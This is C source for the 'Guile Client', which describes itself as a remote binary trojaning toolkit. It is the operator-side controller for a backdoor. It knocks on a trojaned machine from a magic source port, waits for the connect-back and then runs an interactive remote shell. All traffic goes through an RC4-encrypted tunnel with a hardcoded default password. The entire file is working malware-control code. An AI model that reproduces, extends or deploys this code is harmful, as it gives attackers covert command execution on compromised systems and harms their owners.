/*
 * $Id: gc.c,v 1.1 2000/12/18 23:16:59 bind Exp $
 * 
 * Description: Guile client
 * 
 * Author: bind (bind@gravitino.net)
 * 
 * Details: This client listens for a connection from a trojaned machine and
 * allows a user to execute commands remotely, sending and recieving data
 * encrypted with rc4.
 * 
 * Copyright (c) 2000 bind@gravitino.net All rights reserved.
 * 
 * THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE. THE COPYRIGHT NOTICE ABOVE DOES
 * NOT EVIDENCE ANY ACTUAL OR INTENDED PUBLICATION OF SUCH SOURCE CODE. IN NO
 * EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR
 * MISUSE OF THIS SOFTWARE.
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <signal.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <sys/socket.h>

#include "rc4.h"

int net_init(int);
int net_listen(int, char *);
int interactive_session(int, char *);
int connection(char *, int, int);
void sig_handler(int);

void 
usage(char *arg)
{
  printf("\nGuile Client - Remote binary trojaning toolkit\n"
	 "Written by bind@gravitino.net - 12/15/00\n\n");
  printf("Usage:\n"
	 "  %s [options] <host> <port>\n\n"
	 "Options:\n"
	 "  -s <port> Magic source port\n"
	 "  -l <port> Listening port\n"
	 "  -x <password> Password for rc4 encryption tunnel\n\n", arg);
  exit(0);
}

int 
main(int argc, char **argv)
{
  int cport = 0, sport = 48866, lport = 34536, lsd, rsd;
  char c, *prog, *host = NULL, *password = "m4g1c";

  prog = argv[0];
  opterr = 0;
  while ((c = getopt(argc, argv, "s:l:x:h")) != EOF) {
    switch (c) {
      case 's':
	sport = atoi(optarg);
	break;
      case 'l':
	lport = atoi(optarg);
	break;
      case 'x':
	password = optarg;
	break;
      case 'h':
      default:
	usage(argv[0]);
	break;
    }
  }

  argc -= optind;
  argv += optind;

  host = argv[0];
  cport = atoi(argv[1]);

  if (!host || !cport)
    usage(prog);

  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);

  rsd = connection(host, cport, sport);
  printf("(1) Connecting to %s:%d with source port %d..\n", host, cport, sport);

  lsd = net_init(lport);

  printf("(2) Guile client listening on port: %d\n", lport);
  printf("(3) Waiting for connection..\n");

  net_listen(lsd, password);

  shutdown(1, rsd);
  close(lsd);
}

int 
connection(char *host, int cport, int sport)
{
  int sd, res;
  struct sockaddr_in rsin;
  struct sockaddr_in lsin;

  rsin.sin_family = AF_INET;
  rsin.sin_port = ntohs(cport);
  rsin.sin_addr.s_addr = inet_addr(host);

  lsin.sin_family = AF_INET;
  lsin.sin_port = ntohs(sport);
  lsin.sin_addr.s_addr = INADDR_ANY;

  sd = socket(AF_INET, SOCK_STREAM, 0);
  if (sd < 0)
    exit(printf("Error: socket()\n"));

  res = bind(sd, (struct sockaddr *) & lsin, sizeof(lsin));
  if (res < 0)
    exit(printf("Error binding source port, please wait a minute and try again.\n"));

  res = connect(sd, (struct sockaddr *) & rsin, sizeof(rsin));
  if (res < 0)
    exit(printf("Connection refused on %s port %d\n", host, cport));

  return sd;
}

int 
net_init(int port)
{
  int sockfd, res;
  struct sockaddr_in sin;

  memset(&sin, 0, sizeof(sin));

  sockfd = socket(AF_INET, SOCK_STREAM, 0);
  if (sockfd < 0)
    exit(printf("Error: socket()\n"));

  sin.sin_family = AF_INET;
  sin.sin_port = ntohs(port);
  sin.sin_addr.s_addr = INADDR_ANY;

  res = bind(sockfd, (struct sockaddr *) & sin, sizeof(sin));
  if (res < 0)
    exit(printf("Error: bind()\n"));

  res = listen(sockfd, 2);
  if (res < 0)
    exit(printf("Error: listen()\n"));

  return sockfd;
}

int 
net_listen(int sd, char *passwd)
{
  int r_sd, size;
  struct sockaddr_in r_sin;

  size = sizeof(r_sin);

  memset(&r_sin, 0, sizeof(r_sin));
  signal(SIGINT, sig_handler);

  r_sd = accept(sd, (struct sockaddr *) & r_sin, &size);
  if (r_sd < 0)
    return (printf("Error: accept()\n"));

  printf("(4) Connection established with: %s\n", inet_ntoa(r_sin.sin_addr));
  printf("(5) Starting interactive shell, type 'exit' when finished\n");
  printf("(6) Now encrypting all incoming and outgoing data\n\n");
  interactive_session(r_sd, passwd);
  return (0);
}

int 
interactive_session(int sd, char *passwd)
{
  int num;
  char idata[1000], odata[1000];
  unsigned long nb = 1;

  memset(idata, 0, sizeof(idata));

  signal(SIGINT, &sig_handler);

  ioctl(sd, FIONBIO, &nb);
  ioctl(0, FIONBIO, &nb);

  for (;;) {

    memset(idata, 0, sizeof(idata));
    memset(odata, 0, sizeof(odata));

    num = recv(sd, idata, sizeof(idata), 0);
    if (num == 0)
      break;
    if (num > 0) {
      if (rc4crypt(passwd, strlen(passwd), idata, num))
	return (printf("Error: rc4crypt()\n"));
      write(1, idata, num);
    }
    num = read(0, odata, sizeof(odata));

    if (num == -1)
      continue;

    if (rc4crypt(passwd, strlen(passwd), odata, num))
      return (printf("Error: rc4crypt()\n"));

    send(sd, odata, num, 0);
  }
  close(sd);
  return (0);
}

void
sig_handler(int sig)
{
  switch (sig) {
      case SIGINT:putchar('\n');
      exit(0);
      break;
  }
}
